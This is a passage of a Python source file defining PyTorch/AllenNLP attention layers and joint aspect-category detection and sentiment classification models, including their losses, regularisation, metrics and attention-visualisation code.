similarities = self.uw(u) similarities = similarities.squeeze(dim=-1) if self.softmax: alpha = allennlp_util.masked_softmax(similarities, mask) return alpha else: return similarities class DotProductAttentionInHtt(nn.Module): """ 2016-Hierarchical Attention Networks for Document Classification """ def __init__(self, in_features, out_features, bias=True, softmax=True): super().__init__() self.uw = nn.Linear(in_features, 1, bias=False) self.softmax = softmax def forward(self, h: torch.Tensor, mask: torch.Tensor): similarities = self.uw(h) similarities = similarities.squeeze(dim=-1) if self.softmax: alpha = allennlp_util.masked_softmax(similarities, mask) return alpha else: return similarities class AverageAttention(nn.Module): """ 2019-emnlp-Attention is not not Explanation """ def __init__(self): super().__init__() def forward(self, h: torch.Tensor, mask: torch.Tensor): alpha = allennlp_util.masked_softmax(mask, mask) return alpha class BernoulliAttentionInHtt(nn.Module): """ 2016-Hierarchical Attention Networks for Document Classification """ def __init__(self, in_features, out_features, bias=True): super().__init__() self.W = nn.Linear(in_features, out_features, bias) self.uw = nn.Linear(out_features, 1, bias=False) def forward(self, h: torch.Tensor, mask: torch.Tensor): u = self.W(h) u = torch.tanh(u) similarities = self.uw(u) similarities = similarities.squeeze(dim=-1) alpha = torch.sigmoid(similarities) return alpha class AttentionInCan(nn.Module): """ 2019-emnlp-CAN Constrained Attention Networks for Multi-Aspect Sentiment Analysis """ def __init__(self, in_features, bias=True, softmax=True): super().__init__() self.W1 = nn.Linear(in_features, in_features, bias) self.W2 = nn.Linear(in_features, in_features, bias) self.uw = nn.Linear(in_features, 1, bias=False) self.softmax = softmax def forward(self, h1: torch.Tensor, h2: torch.Tensor, mask: torch.Tensor): u1 = self.W1(h1) u2 = self.W2(h2) u = u1 + u2 u = torch.tanh(u) similarities = self.uw(u) similarities = 
similarities.squeeze(dim=-1) if self.softmax: alpha = allennlp_util.masked_softmax(similarities, mask) return alpha else: return similarities class LocationMaskLayer(nn.Module): """ 2017-CIKM-Aspect-level Sentiment Classification with HEAT (HiErarchical ATtention) Network """ def __init__(self, location_num, configuration): super().__init__() self.location_num = location_num self.configuration = configuration def forward(self, alpha: torch.Tensor): location_num = self.location_num location_matrix = torch.zeros([location_num, location_num], dtype=torch.float, device=self.configuration['device'], requires_grad=False) for i in range(location_num): for j in range(location_num): location_matrix[i, j] = 1 - (abs(i - j) / location_num) result = alpha.mm(location_matrix) return result class TextInAllAspectSentimentOutModel(Model): def __init__(self, vocab: Vocabulary, category_loss_weight=1, sentiment_loss_weight=1): super().__init__(vocab) self.category_loss_weight = category_loss_weight self.sentiment_loss_weight = sentiment_loss_weight def matrix_mul(self, input, weight, bias=False): feature_list = [] for feature in input: feature = torch.mm(feature, weight) if isinstance(bias, torch.nn.parameter.Parameter): feature = feature + bias.expand(feature.size()[0], bias.size()[1]) feature = torch.tanh(feature).unsqueeze(0) feature_list.append(feature) return torch.cat(feature_list, 0).squeeze() def element_wise_mul(self, input1, input2, return_not_sum_result=False): feature_list = [] for feature_1, feature_2 in zip(input1, input2): feature_2 = feature_2.unsqueeze(1) feature_2 = feature_2.expand_as(feature_1) feature = feature_1 * feature_2 feature = feature.unsqueeze(0) feature_list.append(feature) output = torch.cat(feature_list, 0) result = torch.sum(output, 1) if return_not_sum_result: return result, output else: return result def reduce(self, nodes): """Take an average over all neighbor node features hu and use it to overwrite the original node feature.""" m = 
nodes.mailbox['m'] accum = torch.sum(m, 1) return {'h': accum} def pad_dgl_graph(self, graphs, max_node_num): graphs_padded = [] for graph in graphs: graph_padded = copy.deepcopy(graph) node_num = graph.number_of_nodes() graph_padded.add_nodes(max_node_num - node_num) graphs_padded.append(graph_padded) return graphs_padded def no_grad_for_acd_parameter(self): self.set_grad_for_acd_parameter(requires_grad=False) def set_grad_for_acd_parameter(self, requires_grad=True): pass def set_grad_for_acsc_parameter(self, requires_grad=True): pass def _get_model_visualization_picture_filepath(self, configuration: dict, words: list): savefig_dir = configuration['savefig_dir'] if not savefig_dir: return None filename = '%s-%s.svg' % ('-'.join(words[:3]), str(time.time())) filename = re.sub('/', '', filename) return os.path.join(savefig_dir, filename) class AsMilSimultaneouslyV5(TextInAllAspectSentimentOutModel): def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder, aspect_embedder: TextFieldEmbedder, categories: list, polarities: list, vocab: Vocabulary, configuration: dict, category_loss_weight=1, sentiment_loss_weight=1): super().__init__(vocab, category_loss_weight=category_loss_weight, sentiment_loss_weight=sentiment_loss_weight) self.configuration = configuration self.word_embedder = word_embedder self.position_embedder = position_embedder self.aspect_embedder = aspect_embedder self.categories = categories self.polarites = polarities self.category_num = len(categories) self.polarity_num = len(polarities) self.category_loss = nn.BCEWithLogitsLoss() self.sentiment_loss = nn.CrossEntropyLoss() self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) word_embedding_dim = word_embedder.get_output_dim() if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True) elif 
self.configuration['lstm_or_fc_after_embedding_layer'] == 'bilstm': self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=1) else: self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, word_embedding_dim, batch_first=True, bidirectional=False, num_layers=1) self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim) for _ in range(self.category_num)] self.embedding_layer_aspect_attentions = nn.ModuleList(self.embedding_layer_aspect_attentions) lstm_input_size = word_embedding_dim if self.configuration['position']: lstm_input_size += position_embedder.get_output_dim() if self.configuration['sentence_encoder_for_sentiment'] == 'cnn': ngram_filter_sizes = (2, 3, 4) self.cnn_encoder = CnnEncoder(lstm_input_size, int(word_embedding_dim / len(ngram_filter_sizes)), ngram_filter_sizes=ngram_filter_sizes) else: num_layers = self.configuration['lstm_layer_num_in_lstm'] self.lstm = torch.nn.LSTM(lstm_input_size, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=num_layers, dropout=0.5) self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.category_fcs = nn.ModuleList(self.category_fcs) if self.configuration['lstm_layer_category_classifier']: self.lstm_category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.lstm_category_fcs = nn.ModuleList(self.lstm_category_fcs) sentiment_fc_input_size = word_embedding_dim if not self.configuration['share_sentiment_classifier']: self.sentiment_fcs = [nn.Sequential(nn.Linear(sentiment_fc_input_size, sentiment_fc_input_size), nn.ReLU(), nn.Linear(sentiment_fc_input_size, self.polarity_num)) for _ in range(self.category_num)] self.sentiment_fcs = nn.ModuleList(self.sentiment_fcs) else: self.sentiment_fc = nn.Sequential(nn.Linear(sentiment_fc_input_size, sentiment_fc_input_size), nn.ReLU(), 
nn.Linear(sentiment_fc_input_size, self.polarity_num)) self.dropout_after_embedding_layer = nn.Dropout(0.5) self.dropout_after_lstm_layer = nn.Dropout(0.5) # self.gc1 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) # self.gc2 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) def set_grad_for_acd_parameter(self, requires_grad=True): acd_layers = [] if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': acd_layers.append(self.embedding_layer_fc) else: acd_layers.append(self.embedding_layer_lstm) acd_layers.append(self.embedding_layer_aspect_attentions) acd_layers.append(self.category_fcs) for layer in acd_layers: for name, value in layer.named_parameters(): value.requires_grad = requires_grad def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor, polarity_mask: torch.Tensor, sample: list, aspects: torch.Tensor=None) -> torch.Tensor: mask = get_text_field_mask(tokens) word_embeddings = self.word_embedder(tokens) if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': word_embeddings_fc = self.embedding_layer_fc(word_embeddings) elif self.configuration['lstm_or_fc_after_embedding_layer'] == 'gcn': max_len = tokens['tokens'].size()[1] graphs = [e[3] for e in sample] graphs_padded = self.pad_dgl_graph(graphs, max_len) word_embeddings_fc = F.relu(self.gc_aspect_category(word_embeddings, graphs_padded)) else: word_embeddings_fc, (_, _) = self.embedding_layer_lstm(word_embeddings) aspects_separate = [{'aspect': aspects['aspect'][:, i].unsqueeze(1)} for i in range(self.category_num)] aspect_embeddings_singles = [self.aspect_embedder(aspects_separate[i]).squeeze(1) for i in range(self.category_num)] aspects_seprate_repeat = [{'aspect': aspects_separate[i]['aspect'].expand_as(tokens['tokens'])} for i in range(self.category_num)] aspect_embeddings_separate = [self.aspect_embedder(aspects_seprate_repeat[i]) for i in range(self.category_num)] 
embedding_layer_category_outputs = [] embedding_layer_category_alphas = [] embedding_layer_sentiment_outputs = [] embedding_layer_sentiment_alphas = [] embedding_layer_category_alphas = [] for i in range(self.category_num): embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i] alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask) embedding_layer_category_alphas.append(alpha) for i in range(self.category_num): alpha = embedding_layer_category_alphas[i] category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False) embedding_layer_category_outputs.append(category_output) lstm_input = word_embeddings if self.configuration['position']: position_embeddings = self.position_embedder(position) lstm_input = torch.cat([word_embeddings, position_embeddings], dim=-1) lstm_input = self.dropout_after_embedding_layer(lstm_input) if self.configuration['sentence_encoder_for_sentiment'] == 'cnn': lstm_result = self.cnn_encoder(lstm_input, mask) else: lstm_result, _ = self.lstm(lstm_input) lstm_result = self.dropout_after_lstm_layer(lstm_result) # lstm_result_with_position = torch.cat([lstm_result, position_embeddings], dim=-1) lstm_layer_category_outputs = [] lstm_layer_sentiment_outputs = [] lstm_layer_words_sentiment_soft = [] # max_len = tokens['tokens'].size()[1] # graphs = [e[3] for e in sample] # graphs_padded = self.pad_dgl_graph(graphs, max_len) # graph_output1 = F.relu(self.gc1(word_embeddings, graphs_padded)) # graph_output2 = F.relu(self.gc2(graph_output1, graphs_padded)) for i in range(self.category_num): alpha = embedding_layer_category_alphas[i] category_output = self.element_wise_mul(lstm_result, alpha, return_not_sum_result=False) lstm_layer_category_outputs.append(category_output) # sentiment # word_representation_for_sentiment = torch.cat([graph_output2, lstm_result], dim=-1) word_representation_for_sentiment = lstm_result sentiment_alpha = embedding_layer_category_alphas[i] if 
self.configuration['mil']: sentiment_alpha = sentiment_alpha.unsqueeze(1) if not self.configuration['share_sentiment_classifier']: words_sentiment = self.sentiment_fcs[i](word_representation_for_sentiment) else: words_sentiment = self.sentiment_fc(word_representation_for_sentiment) if self.configuration['mil_softmax']: words_sentiment_soft = torch.softmax(words_sentiment, dim=-1) lstm_layer_words_sentiment_soft.append(words_sentiment_soft) else: words_sentiment_soft = words_sentiment lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1)) sentiment_output = torch.matmul(sentiment_alpha, words_sentiment_soft).squeeze(1) # batch_size x 2*hidden_dim lstm_layer_sentiment_outputs.append(sentiment_output) else: sentiment_output_temp = self.element_wise_mul(word_representation_for_sentiment, sentiment_alpha, return_not_sum_result=False) if not self.configuration['share_sentiment_classifier']: sentiment_output = self.sentiment_fcs[i](sentiment_output_temp) else: sentiment_output = self.sentiment_fc(sentiment_output_temp) lstm_layer_sentiment_outputs.append(sentiment_output) final_category_outputs = [] final_lstm_category_outputs = [] final_sentiment_outputs = [] for i in range(self.category_num): fc = self.category_fcs[i] category_output = embedding_layer_category_outputs[i] final_category_output = fc(category_output) final_category_outputs.append(final_category_output) if self.configuration['lstm_layer_category_classifier']: fc_lstm = self.lstm_category_fcs[i] lstm_category_output = lstm_layer_category_outputs[i] final_lstm_category_output = fc_lstm(lstm_category_output) final_lstm_category_outputs.append(final_lstm_category_output) final_sentiment_output = lstm_layer_sentiment_outputs[i] final_sentiment_outputs.append(final_sentiment_output) output = {} output['alpha'] = embedding_layer_category_alphas if label is not None: category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(self.category_num): 
category_labels.append(label[:, i]) polarity_labels.append(label[:, i + self.category_num]) polarity_masks.append(polarity_mask[:, i]) loss = 0 total_category_loss = 0 total_sentiment_loss = 0 for i in range(self.category_num): category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1), category_labels[i]) sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long()) total_category_loss += category_temp_loss if not self.configuration['only_acd']: total_sentiment_loss += sentiment_temp_loss if self.configuration['lstm_layer_category_classifier']: lstm_category_temp_loss = self.category_loss(final_lstm_category_outputs[i].squeeze(dim=-1), category_labels[i]) total_category_loss += lstm_category_temp_loss loss = self.category_loss_weight * total_category_loss + self.sentiment_loss_weight * total_sentiment_loss # Sparse Regularization Orthogonal Regularization if self.configuration['sparse_reg'] or self.configuration['orthogonal_reg']: reg_loss = 0 for j in range(len(sample)): polarity_mask_of_one_sample = polarity_mask[j] category_alpha_of_one_sample = [embedding_layer_category_alphas[k][j] for k in range(self.category_num)] category_alpha_of_mentioned = [] category_alpha_of_not_mentioned = [] for k in range(self.category_num): if polarity_mask_of_one_sample[k] == 1: category_alpha_of_mentioned.append(category_alpha_of_one_sample[k].unsqueeze(0)) else: category_alpha_of_not_mentioned.append(category_alpha_of_one_sample[k].unsqueeze(0)) if len(category_alpha_of_not_mentioned) != 0: category_alpha_of_not_mentioned = torch.cat(category_alpha_of_not_mentioned, dim=0) category_alpha_of_not_mentioned = torch.mean(category_alpha_of_not_mentioned, dim=0, keepdim=True) category_alpha_of_mentioned.append(category_alpha_of_not_mentioned) category_eye = torch.eye(len(category_alpha_of_mentioned)) category_alpha_of_mentioned = torch.cat(category_alpha_of_mentioned, dim=0) category_alpha_similarity = 
torch.mm(category_alpha_of_mentioned, category_alpha_of_mentioned.t()) if self.configuration['sparse_reg'] and self.configuration['orthogonal_reg']: pass elif self.configuration['sparse_reg']: for m in range(len(category_alpha_of_mentioned)): for n in range(len(category_alpha_of_mentioned)): if m != n: category_eye[m][n] = category_alpha_similarity[m][n] else: # orthogonal_reg for m in range(len(category_alpha_of_mentioned)): category_eye[m][m] = category_alpha_similarity[m][m] # category_eye = nn_util.move_to_device(category_eye, self.configuration['device']) category_eye = category_eye.to(self.configuration['device']) category_alpha_similarity = category_alpha_similarity.to(self.configuration['device']) category_reg_loss = category_alpha_similarity - category_eye category_reg_loss = torch.norm(category_reg_loss) reg_loss += category_reg_loss loss += (reg_loss * self.configuration['attention_lamda'] / len(sample)) # sentiment accuracy sentiment_logit = torch.cat(final_sentiment_outputs) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs] category_prob = torch.cat(final_category_outputs_prob).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) output['loss'] = loss # visualize attention pred_category = [torch.sigmoid(e) for e in final_category_outputs] pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs] output['pred_category'] = pred_category output['pred_sentiment'] = pred_sentiment output['embedding_layer_category_alphas'] = embedding_layer_category_alphas output['lstm_layer_words_sentiment_soft'] = lstm_layer_words_sentiment_soft if self.configuration['visualize_attention']: for i in range(len(sample)): words = sample[i][2] # if not ('while' in words and 'there' in words): # continue 
attention_labels = [e.split('/')[0] for e in self.categories] label_true = label[i].detach().cpu().numpy()[: self.category_num] if sum(label_true) <= 1: continue # category visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()), str(pred_category[j][i].detach().cpu().numpy())) for j in range(self.category_num)] attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_category, attention_labels, titles) # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, # attention_labels, titles, # savefig_filepath=savefig_filepath) # sentiment embedding layer # visual_attentions = [embedding_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer # visual_attentions = [lstm_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] for j in 
range(self.category_num): c_label = label[i][j].detach().cpu().numpy().tolist() if c_label == 1: visual_attentions_sentiment = [] labels_sentiment = [] sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist()) if sentiment_true_index == -100: continue titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]), str(pred_sentiment[j][i].detach().cpu().numpy()), str(self.polarites))] c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() visual_attentions_sentiment.append(c_attention) labels_sentiment.append(self.categories[j].split('/')[0]) s_distributions = visual_attentions_sentiment_temp[j] for k in range(self.polarity_num): labels_sentiment.append(self.polarites[k]) visual_attentions_sentiment.append(s_distributions[:, k]) titles_sentiment.extend([''] * 3) attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_sentiment, labels_sentiment, titles_sentiment) # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, # attention_labels, titles, # savefig_filepath=savefig_filepath) print() return output def get_metrics(self, reset: bool = False) -> Dict[str, float]: metrics = { 'accuracy': self._accuracy.get_metric(reset), 'category_f1': self._f1.get_metric(reset)['fscore'] } return metrics class AsMil(Model): def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder, categories: list, polarities: list, vocab: Vocabulary, configuration: dict): super().__init__(vocab) self.configuration = configuration self.word_embedder = word_embedder self.position_embedder = position_embedder self.categories = categories self.polarites = polarities self.category_num = len(categories) self.polarity_num = len(polarities) self.category_loss = nn.BCEWithLogitsLoss() self.sentiment_loss = 
nn.CrossEntropyLoss() self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) word_embedding_dim = word_embedder.get_output_dim() if self.configuration['position']: word_embedding_dim += position_embedder.get_output_dim() self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True) self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim) for _ in range(self.category_num)] lstm_input_size = word_embedding_dim num_layers = 3 self.lstm = torch.nn.LSTM(lstm_input_size, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=num_layers, dropout=0.5) self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] if self.configuration['lstm_layer_category_classifier']: self.lstm_category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.sentiment_fc = nn.Sequential(nn.Linear(word_embedding_dim, word_embedding_dim), nn.ReLU(), nn.Linear(word_embedding_dim, self.polarity_num)) # self.gc1 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) # self.gc2 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) def matrix_mul(self, input, weight, bias=False): feature_list = [] for feature in input: feature = torch.mm(feature, weight) if isinstance(bias, torch.nn.parameter.Parameter): feature = feature + bias.expand(feature.size()[0], bias.size()[1]) feature = torch.tanh(feature).unsqueeze(0) feature_list.append(feature) return torch.cat(feature_list, 0).squeeze() def element_wise_mul(self, input1, input2, return_not_sum_result=False): feature_list = [] for feature_1, feature_2 in zip(input1, input2): feature_2 = feature_2.unsqueeze(1) feature_2 = feature_2.expand_as(feature_1) feature = feature_1 * feature_2 feature = feature.unsqueeze(0) feature_list.append(feature) output = torch.cat(feature_list, 0) result = torch.sum(output, 1) if return_not_sum_result: 
return result, output else: return result def reduce(self, nodes): """Take an average over all neighbor node features hu and use it to overwrite the original node feature.""" m = nodes.mailbox['m'] accum = torch.sum(m, 1) return {'h': accum} def pad_dgl_graph(self, graphs, max_node_num): graphs_padded = [] for graph in graphs: graph_padded = copy.deepcopy(graph) node_num = graph.number_of_nodes() graph_padded.add_nodes(max_node_num - node_num) graphs_padded.append(graph_padded) return graphs_padded def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor, polarity_mask: torch.Tensor, sample: list) -> torch.Tensor: mask = get_text_field_mask(tokens) word_embeddings = self.word_embedder(tokens) if self.configuration['position']: position_embeddings = self.position_embedder(position) word_embeddings = torch.cat([word_embeddings, position_embeddings], dim=-1) word_embeddings_fc = self.embedding_layer_fc(word_embeddings) embedding_layer_category_outputs = [] embedding_layer_category_alphas = [] embedding_layer_sentiment_outputs = [] embedding_layer_sentiment_alphas = [] for i in range(self.category_num): embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i] alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask) embedding_layer_category_alphas.append(alpha) category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False) embedding_layer_category_outputs.append(category_output) lstm_result, _ = self.lstm(word_embeddings) # lstm_result_with_position = torch.cat([lstm_result, position_embeddings], dim=-1) lstm_layer_category_outputs = [] lstm_layer_sentiment_outputs = [] lstm_layer_words_sentiment_soft = [] # max_len = tokens['tokens'].size()[1] # graphs = [e[3] for e in sample] # graphs_padded = self.pad_dgl_graph(graphs, max_len) # graph_output1 = F.relu(self.gc1(word_embeddings, graphs_padded)) # graph_output2 = F.relu(self.gc2(graph_output1, graphs_padded)) for i in 
range(self.category_num): alpha = embedding_layer_category_alphas[i] category_output = self.element_wise_mul(lstm_result, alpha, return_not_sum_result=False) lstm_layer_category_outputs.append(category_output) # sentiment # word_representation_for_sentiment = torch.cat([graph_output2, lstm_result], dim=-1) word_representation_for_sentiment = lstm_result sentiment_alpha = embedding_layer_category_alphas[i] if self.configuration['mil']: sentiment_alpha = sentiment_alpha.unsqueeze(1) words_sentiment = self.sentiment_fc(word_representation_for_sentiment) if self.configuration['mil_softmax']: words_sentiment_soft = torch.softmax(words_sentiment, dim=-1) lstm_layer_words_sentiment_soft.append(words_sentiment_soft) else: words_sentiment_soft = words_sentiment lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1)) sentiment_output = torch.matmul(sentiment_alpha, words_sentiment_soft).squeeze(1) # batch_size x 2*hidden_dim lstm_layer_sentiment_outputs.append(sentiment_output) else: sentiment_output = self.element_wise_mul(word_representation_for_sentiment, sentiment_alpha, return_not_sum_result=False) lstm_layer_sentiment_outputs.append(sentiment_output) final_category_outputs = [] final_lstm_category_outputs = [] final_sentiment_outputs = [] for i in range(self.category_num): fc = self.category_fcs[i] category_output = embedding_layer_category_outputs[i] final_category_output = fc(category_output) final_category_outputs.append(final_category_output) if self.configuration['lstm_layer_category_classifier']: fc_lstm = self.lstm_category_fcs[i] lstm_category_output = lstm_layer_category_outputs[i] final_lstm_category_output = fc_lstm(lstm_category_output) final_lstm_category_outputs.append(final_lstm_category_output) sentiment_output = lstm_layer_sentiment_outputs[i] if self.configuration['mil']: final_sentiment_output = sentiment_output else: final_sentiment_output = self.sentiment_fc(sentiment_output) 
final_sentiment_outputs.append(final_sentiment_output) output = {} if label is not None: category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(self.category_num): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + self.category_num]) polarity_masks.append(polarity_mask[:, i]) loss = 0 for i in range(self.category_num): category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1), category_labels[i]) sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long()) loss += category_temp_loss if not self.configuration['only_acd']: loss += sentiment_temp_loss if self.configuration['lstm_layer_category_classifier']: lstm_category_temp_loss = self.category_loss(final_lstm_category_outputs[i].squeeze(dim=-1), category_labels[i]) loss += lstm_category_temp_loss # sentiment accuracy sentiment_logit = torch.cat(final_sentiment_outputs) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs] category_prob = torch.cat(final_category_outputs_prob).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) output['loss'] = loss # visualize attention pred_category = [torch.sigmoid(e) for e in final_category_outputs] pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs] output['pred_category'] = pred_category output['pred_sentiment'] = pred_sentiment if self.configuration['visualize_attention']: for i in range(len(sample)): words = sample[i][2] attention_labels = [e.split('/')[0] for e in self.categories] # category visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] titles = ['true: %s - pred: %s' % 
(str(label[i][j].detach().cpu().numpy()), str(pred_category[j][i].detach().cpu().numpy())) for j in range(self.category_num)] attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, attention_labels, titles) # sentiment embedding layer # visual_attentions = [embedding_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer # visual_attentions = [lstm_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] for j in range(self.category_num): c_label = label[i][j].detach().cpu().numpy().tolist() if c_label == 1: visual_attentions_sentiment = [] labels_sentiment = [] sentiment_true_index = int(label[i][j + self.category_num].detach().cpu().numpy().tolist()) if sentiment_true_index == -100: continue titles_sentiment = ['true: %s - pred: %s - %s' % (str(self.polarites[sentiment_true_index]), str(pred_sentiment[j][i].detach().cpu().numpy()), str(self.polarites))] c_attention = embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() visual_attentions_sentiment.append(c_attention) 
                        # Continuation of the visualization loop of the preceding forward():
                        # first row is the aspect's category attention, then one row per polarity.
                        labels_sentiment.append(self.categories[j].split('/')[0])
                        s_distributions = visual_attentions_sentiment_temp[j]
                        for k in range(self.polarity_num):
                            labels_sentiment.append(self.polarites[k])
                            visual_attentions_sentiment.append(s_distributions[:, k])
                        titles_sentiment.extend([''] * 3)
                        attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_sentiment,
                                                                               labels_sentiment, titles_sentiment)
                        # NOTE(review): debug leftover — prints an empty line per plotted aspect.
                        print()
        return output

    def get_metrics(self, reset: bool = False) -> Dict[str, float]:
        """Return sentiment accuracy and aspect-category F1 accumulated by forward()."""
        metrics = {
            'accuracy': self._accuracy.get_metric(reset),
            'category_f1': self._f1.get_metric(reset)['fscore']
        }
        return metrics


class AsMilSimultaneouslyBert(TextInAllAspectSentimentOutModel):
    """Joint aspect-category detection (ACD) and aspect-category sentiment
    classification (ACSC) model.

    ACD runs attention over non-BERT word embeddings; ACSC scores BERT token
    embeddings (optionally through a BiLSTM) and pools them with the ACD
    attention weights (multiple-instance learning, ``mil``) or falls back to
    the per-aspect BERT [CLS] vector.
    """

    def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder,
                 categories: list, polarities: list, vocab: Vocabulary, configuration: dict,
                 bert_word_embedder: TextFieldEmbedder=None):
        super().__init__(vocab)
        self.configuration = configuration
        self.word_embedder = word_embedder
        self.position_embedder = position_embedder
        self.categories = categories
        self.polarites = polarites if False else polarities  # NOTE(review): attribute name keeps the file-wide 'polarites' typo
        self.category_num = len(categories)
        self.polarity_num = len(polarities)
        self.category_loss = nn.BCEWithLogitsLoss()
        self.sentiment_loss = nn.CrossEntropyLoss()
        self._accuracy = metrics.CategoricalAccuracy()
        self._f1 = allennlp_metrics.BinaryF1(0.5)
        word_embedding_dim = word_embedder.get_output_dim()
        # Context encoder over the (non-BERT) word embeddings used by ACD.
        if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc':
            self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True)
        elif self.configuration['lstm_or_fc_after_embedding_layer'] == 'bilstm':
            self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, int(word_embedding_dim / 2),
                                                      batch_first=True, bidirectional=True, num_layers=1)
        else:
            self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, word_embedding_dim,
                                                      batch_first=True, bidirectional=False, num_layers=1)
        # One attention head and one binary classifier per aspect category.
        self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim,
